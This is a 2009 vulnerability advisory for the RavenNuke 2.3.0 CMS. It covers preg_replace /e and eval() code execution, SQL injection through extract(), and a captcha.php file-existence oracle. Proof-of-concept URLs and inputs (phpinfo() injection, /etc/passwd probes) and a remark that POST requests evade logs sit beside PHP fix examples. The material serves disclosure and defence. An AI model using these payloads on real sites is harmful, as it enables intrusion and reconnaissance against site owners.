[waraxe-2009-SA#072] - Multiple Vulnerabilities in RavenNuke 2.3.0
================================================================================

Author: Janek Vind "waraxe"
Date: 16. February 2009
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-72.html


Description of vulnerable software:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

RavenNuke is a web-based automated news publishing and content management
system based on PHP and MySQL. The system is fully controlled using a web-based
graphical user interface (GUI). RavenNuke is an extensively changed fork of
the phpNuke portal system.

http://ravenphpscripts.com/


List of found vulnerabilities
================================================================================

1. Remote PHP Code Execution in "avatarlist.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Security risk: High

Reasons:
1. uninitialized arrays "patterns" and "replacements"
Preconditions:
1. attacker must be logged in as user
Comments:
1. Exploit is using "preg_replace" e-modifier
2. "register_globals" setting does not matter
3. Sentinel will not stop this exploit
4. POST method will leave clean logs in most real-world cases

Test using GET method:

http://localhost/ravennuke230/modules.php?name=Your_Account&op=avatarlist&avatarcategory=gallery&patterns[6]=/a/e&replacements[6]=phpinfo()

Test using POST method:
------------------------------------------------------------



------------------------------------------------------------

Fragment of vulnerable source code:
------------------------------------------------------------
$patterns[0] = '/\.gif/';
$patterns[1] = '/\.png/';
...
$replacements[1] = '';
$replacements[0] = '';
...
$entryname = preg_replace($patterns, $replacements, $entry);
------------------------------------------------------------

Solution: initialize arrays before use.
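The following is an added example, not RavenNuke code, showing the shape of the defect and the fix: a pattern list built on top of uninitialised arrays keeps whatever entries were already in scope, while a locally initialised list built only from script-owned literals cannot. The function names are hypothetical, and the "global" keyword stands in for whatever mechanism imports request variables into the script's scope (the advisory notes register_globals is not required). A validator for pattern strings is included for code that has to accept patterns from configuration.

```php
<?php
// Added example, not RavenNuke code. Function names are hypothetical;
// "global" simulates a scope already polluted with request variables.

// Vulnerable shape: $patterns and $replacements are never initialised, so
// any entries already present in scope survive and reach preg_replace().
function strip_extensions_unsafe($entry)
{
    global $patterns, $replacements;
    $patterns[0]     = '/\.gif/';
    $patterns[1]     = '/\.png/';
    $replacements[1] = '';
    $replacements[0] = '';
    return preg_replace($patterns, $replacements, $entry);
}

// Hardened shape: local arrays, initialised, containing only literals the
// script owns. Nothing from request scope can reach preg_replace().
function strip_extensions_safe($entry)
{
    $patterns     = array('/\.gif$/i', '/\.png$/i');
    $replacements = array('', '');
    return preg_replace($patterns, $replacements, $entry);
}

// Defensive check for code that must accept patterns from configuration:
// a non-alphanumeric delimiter, a body, the same delimiter again, then only
// modifiers from a short allow-list. The /e modifier (code execution on
// PHP 5, removed in PHP 7) and anything else unexpected is rejected.
function pattern_is_allowed($pattern)
{
    return is_string($pattern)
        && preg_match('~^([^\w\s\\\\])(.*)\1[imsux]*$~s', $pattern) === 1;
}

// Constructed demonstration: a stray pair at index 6, as a polluted scope
// would contain, is applied by the unsafe version and ignored by the safe
// one. A harmless replacement is used; the advisory's point is that the
// attacker chooses both the pattern and its modifiers.
$patterns     = array(6 => '/a/');
$replacements = array(6 => 'X');
var_dump(strip_extensions_unsafe('avatar.gif'));   // injected pair is applied
var_dump(strip_extensions_safe('avatar.gif'));     // only the extension removed
var_dump(pattern_is_allowed('/\.gif$/i'));         // accepted
var_dump(pattern_is_allowed('/a/e'));              // rejected: /e not allowed
```

Initialising the arrays is the fix the advisory asks for; keeping them local to the function removes the dependence on scope entirely, and the validator is a second layer for any code path where patterns are not literals.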


2. Remote PHP Code Execution in "Your Account" module
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Security risk: medium

Reasons:
1. insecure use of "eval()" php function
Preconditions:
1. Attacker must have admin rights for "Your Account" in
order to change custom fields
Comments:
1. This is privilege escalation vulnerability

Test:

1. log in as admin and go to "Custom Fields" in users administration:

http://localhost/ravennuke230/admin.php?op=yaCustomFields

2. insert "_Z;phpinfo()" (without quotes) into input box "ID Field Name"

3. click "Save fields"

4. now go to "Users":

http://localhost/ravennuke230/admin.php?op=yaUsers

and select "User Details" for any user, click "OK".
Resulting page will display output of the "phpinfo()", done :)

Fragment of vulnerable source code:
-------------------------------------------------------
/* Get Custom Fields and display them in desired order
...
$result = $db->sql_query('SELECT * FROM ' . $user_prefix . '_users_fields
WHERE need <> "0" AND public="1" ORDER BY pos');
...
while ($sqlvalue = $db->sql_fetchrow($result)) {
if (substr($sqlvalue['name'], 0, 1) == '_')
@eval('$name_exit = ' . $sqlvalue['name'] . ';');
-------------------------------------------------------
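The eval() above exists to turn a field name beginning with "_" into the value of a language constant of that name. The following added example, not RavenNuke code, does the same job without evaluating any string as code: it accepts only a strict identifier and resolves it with constant(), and it applies the same rule where the admin form stores the field name. Function names and the sample constant are hypothetical.

```php
<?php
// Added example, not RavenNuke code. Function names are hypothetical.

// Vulnerable shape from the advisory: the stored field name is spliced into
// PHP source, so a name such as "_Z;phpinfo()" runs as code.
function field_label_unsafe($name)
{
    $name_exit = $name;
    if (substr($name, 0, 1) == '_') {
        @eval('$name_exit = ' . $name . ';');
    }
    return $name_exit;
}

// A leading underscore means "this is the name of a language constant".
// Accept only a strict identifier, resolve it with constant(), and show
// anything else literally. No string is ever evaluated as code.
function field_label_safe($name)
{
    if (!is_string($name) || substr($name, 0, 1) !== '_') {
        return $name;
    }
    if (!preg_match('/^_[A-Z0-9_]*[A-Z0-9]$/', $name)) {
        return $name;   // not a plausible constant name: plain label
    }
    return defined($name) ? constant($name) : $name;
}

// Enforce the same rule where the admin form stores the field, so hostile
// names never reach the database in the first place.
function custom_field_name_is_valid($name)
{
    if (!is_string($name) || $name === '' || strlen($name) > 64) {
        return false;
    }
    if (substr($name, 0, 1) === '_') {
        return preg_match('/^_[A-Z0-9_]*[A-Z0-9]$/', $name) === 1;
    }
    return preg_match('/^[A-Za-z0-9 ]+$/', $name) === 1;
}

// Constructed sample values: _EMAIL stands in for a language constant.
define('_EMAIL', 'E-mail address');
var_dump(field_label_safe('_EMAIL'));                   // resolved via constant()
var_dump(field_label_safe('_Z;phpinfo()'));             // returned as a literal
var_dump(custom_field_name_is_valid('_EMAIL'));         // accepted at save time
var_dump(custom_field_name_is_valid('_Z;phpinfo()'));   // rejected at save time
```

The display-side check is what removes the code execution; the save-side check is what keeps the privilege boundary meaningful, since the advisory's precondition is only "Your Account" admin rights, not full control of the server.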


3. SQL Injection in "Resend_Email" module
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Security risk: medium

Reasons:
1. Insecure use of "extract()" php function
Preconditions:
1. attacker must be logged in as admin

Comments:
1. This is privilege escalation vulnerability
2. POST method will leave clean logs in most real-world cases

Test using POST method:
------------------------------------------------------------



------------------------------------------------------------

Fragment of vulnerable source code:
------------------------------------------------------------
if (!is_admin($admin)) endit(_ACCESSDENIED);
...
extract($HTTP_POST_VARS);
...
$result = $db->sql_query('select user_id, username, user_email, user_password,
user_regdate, check_num, time, requestor from '.$user_prefix.'_users_temp');
------------------------------------------------------------

Solution: use EXTR_SKIP to avoid overwriting of existing variables
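The added example below, not RavenNuke code, shows why the admin check does not help here: it runs before extract(), but $user_prefix is read afterwards, so a POST field of that name lands in the table reference unescaped. It places the advisory's EXTR_SKIP fix next to a version that avoids extract() altogether. is_admin_stub() and the token it checks are hypothetical stand-ins for RavenNuke's is_admin(), and the query is reduced to the table reference shown above.

```php
<?php
// Added example, not RavenNuke code. is_admin_stub() stands in for
// RavenNuke's is_admin(); the session token is a constructed value.

function is_admin_stub($admin)
{
    return $admin === 'valid-admin-session';
}

// Vulnerable shape: every POST key becomes a local variable. The check on
// $admin has already passed, but $user_prefix is read *after* extract(), so
// a POST field named "user_prefix" ends up unescaped in the SQL statement.
function resend_query_unsafe(array $post, $admin, $user_prefix)
{
    if (!is_admin_stub($admin)) {
        return null;
    }
    extract($post);
    return 'select user_id, username from ' . $user_prefix . '_users_temp';
}

// Safer shape 1, the advisory's suggestion: EXTR_SKIP never overwrites a
// variable that already exists, so $user_prefix keeps the configured value.
function resend_query_skip(array $post, $admin, $user_prefix)
{
    if (!is_admin_stub($admin)) {
        return null;
    }
    extract($post, EXTR_SKIP);
    return 'select user_id, username from ' . $user_prefix . '_users_temp';
}

// Safer shape 2: no extract() at all. Read only the fields the handler
// needs, each coerced to its expected type before it touches the query.
function resend_query_explicit(array $post, $admin, $user_prefix)
{
    if (!is_admin_stub($admin)) {
        return null;
    }
    $check_num = isset($post['check_num']) ? (int) $post['check_num'] : 0;
    return 'select user_id, username from ' . $user_prefix . '_users_temp'
         . ' where check_num = ' . $check_num;
}

// Constructed POST body: a field whose name collides with a config variable.
$post = array('user_prefix' => 'INJECTED', 'check_num' => '42');
var_dump(resend_query_unsafe($post, 'valid-admin-session', 'nuke'));    // INJECTED_users_temp
var_dump(resend_query_skip($post, 'valid-admin-session', 'nuke'));      // nuke_users_temp
var_dump(resend_query_explicit($post, 'valid-admin-session', 'nuke'));  // nuke_users_temp
```

EXTR_SKIP only protects variables that already exist at the moment extract() runs; anything first assigned or first read later in the script is still attacker-controlled, which is why the explicit version is the one to prefer when touching this code.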


4. Remote Detection of Local Files in "captcha.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Security risk: low

Reasons:
1. uninitialized array "aFonts"
Preconditions:
1. "register_globals=on"
2. "display_errors=on"
Comments:
1. multiple page refreshes may be needed because of source code specifics
2. same method works for remote directories too!

Attacker is able to detect the existence of files or directories on the
server via the different error messages emitted by PHP.

Test 1:

http://localhost/ravennuke230/images/captcha.php?aFonts[]=/etc/waraxe

Result:

Warning: imageftbbox() [function.imageftbbox]: Invalid font filename in
C:\apache_wwwroot\ravennuke230\includes\class.php-captcha.php on line 298

"Invalid font filename" --> file does not exist

One more possible error message:

Warning: imageftbbox(): Could not find/open font in ...

"Could not find/open font" --> file does not exist


Test 2:

http://localhost/ravennuke230/images/captcha.php?aFonts[]=/etc/passwd

Result:

Warning: imageftbbox() [function.imageftbbox]: Could not read font in
C:\apache_wwwroot\ravennuke230\includes\class.php-captcha.php on line 298

"Could not read font" --> file exists
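The oracle works because the font list is uninitialised (so register_globals fills it from the query string) and because the different imageftbbox() warnings reach the client. The added example below, not RavenNuke code, closes both ends: the list starts initialised with script-owned names, every candidate is confined to the fonts directory with realpath(), and every failure mode collapses to the same null so the response says nothing about the filesystem. The directory, font names and function names are hypothetical.

```php
<?php
// Added example, not RavenNuke code. Directory, font names and function
// names are hypothetical.

$FONT_DIR = realpath(__DIR__ . '/fonts');   // assumed location of bundled fonts

// Always start from an initialised, script-owned list. With
// register_globals=on an uninitialised $aFonts could arrive from the URL.
$aFonts = array('monofont.ttf', 'sans.ttf');   // constructed names

// Return the absolute path of a font that is inside $fontDir, or null.
// Missing, unreadable, outside the directory, not a regular file: all the
// same null, so nothing about the filesystem is distinguishable by a client.
function resolve_font($fontDir, $name)
{
    if ($fontDir === false || !is_string($name) || $name === '') {
        return null;
    }
    // basename() drops any directory component; realpath() then resolves
    // symlinks so the prefix check below sees the real location.
    $path = realpath($fontDir . DIRECTORY_SEPARATOR . basename($name));
    if ($path === false || strpos($path, $fontDir . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return (is_file($path) && is_readable($path)) ? $path : null;
}

// Pick one usable font from the list, or null if none qualifies.
function pick_font($fontDir, array $aFonts)
{
    $usable = array();
    foreach ($aFonts as $name) {
        $path = resolve_font($fontDir, $name);
        if ($path !== null) {
            $usable[] = $path;
        }
    }
    if ($usable === array()) {
        // The real reason goes to the server log only; the client learns
        // nothing beyond "CAPTCHA unavailable".
        error_log('captcha: no usable font in ' . var_export($fontDir, true));
        return null;
    }
    return $usable[array_rand($usable)];
}

// Constructed checks: an absolute path and a traversal attempt both resolve
// to null, indistinguishable from a bundled font that is simply missing.
var_dump(resolve_font($FONT_DIR, '/etc/passwd'));
var_dump(resolve_font($FONT_DIR, '../../etc/passwd'));
var_dump(pick_font($FONT_DIR, $aFonts));
```

Independently of the code change, display_errors should be off on a production server so that PHP warnings are logged rather than returned to the client; the advisory lists display_errors=on as a precondition for this finding.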


How to fix:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Upgrade to new version 2.30.01


Disclosure Timeline:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

01/16/09 Developer contacted
01/16/09 Developer's initial response
01/17/09 Findings sent to developer
02/15/09 Patched version 2.30.01 released by developer
02/16/09 Public disclosure


Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greets to ToXiC, y3dips, Sm0ke, Heintz, slimjim100, pexli, mge, str0ke,
to all active waraxe.us forum members and to anyone else who knows me!


Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

come2waraxe@yahoo.com
Janek Vind "waraxe"

Waraxe forum: http://www.waraxe.us/forums.html
Personal homepage: http://www.janekvind.com/

---------------------- [ EOF ] ------------------------------